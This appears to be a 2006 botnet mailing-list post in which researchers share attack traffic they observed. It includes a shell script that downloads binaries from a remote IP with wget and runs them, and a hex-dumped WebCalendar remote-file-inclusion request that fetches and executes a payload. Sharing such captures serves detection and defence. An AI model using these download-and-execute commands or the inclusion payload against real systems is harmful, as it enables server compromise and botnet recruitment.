To report a botnet PRIVATELY please email: [EMAIL PROTECTED] ---------- On 17/03/06, Jamie Riden <[EMAIL PROTECTED]> wrote: > > Anyway, this morning we're back to the usual shell script - > > #!/bin/bash > wget 209.200.224.166/foc > chmod 744 foc > ./foc > wget 209.200.224.166/iron > chmod 744 iron > ./iron
Someone's also trying to use this vulnerability to drop code - http://www.osvdb.org/displayvuln.php?osvdb_id=18954 (Snort is erroneously flagging it as the older http://cve.mitre.org/cgi-bin/cvename.cgi?name=2001-1049) 000 : 47 45 54 20 2F 77 65 62 63 61 6C 65 6E 64 61 72 GET /webcalendar 010 : 2F 73 65 6E 64 5F 72 65 6D 69 6E 64 65 72 73 2E /send_reminders. 020 : 70 68 70 3F 69 6E 63 6C 75 64 65 64 69 72 3D 68 php?includedir=h 030 : 74 74 70 3A 2F 2F 38 33 2E 31 36 2E 31 38 37 2E ttp://83.16.187. 040 : 36 2F 63 6D 64 2E 64 61 74 3F 26 63 6D 64 3D 63 6/cmd.dat?&cmd=c 050 : 64 25 32 30 2F 74 6D 70 3B 77 67 65 74 25 32 30 d%20/tmp;wget%20 060 : 38 33 2E 31 36 2E 31 38 37 2E 36 2F 68 61 69 74 83.16.187.6/hait 070 : 61 3B 63 68 6D 6F 64 25 32 30 37 34 34 25 32 30 a;chmod%20744%20 080 : 68 61 69 74 61 3B 2E 2F 68 61 69 74 61 3B 65 63 haita;./haita;ec 090 : 68 6F 25 32 30 59 59 59 3B 65 63 68 6F 7C 20 20 ho%20YYY;echo| 0a0 : 48 54 54 50 2F 31 2E 31 0A 48 6F 73 74 3A 20 32 HTTP/1.1.Host: 2 0b0 : 30 33 2E 31 31 34 2E 31 33 37 2E 39 0A 55 73 65 03.114.137.9.Use 0c0 : 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C 6C 61 r-Agent: Mozilla 0d0 : 2F 34 2E 30 20 28 63 6F 6D 70 61 74 69 62 6C 65 /4.0 (compatible 0e0 : 3B 20 4D 53 49 45 20 36 2E 30 3B 20 57 69 6E 64 ; MSIE 6.0; Wind 0f0 : 6F 77 73 20 4E 54 20 35 2E 31 3B 29 0A 0A ows NT 5.1;).. _______________________________________________ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
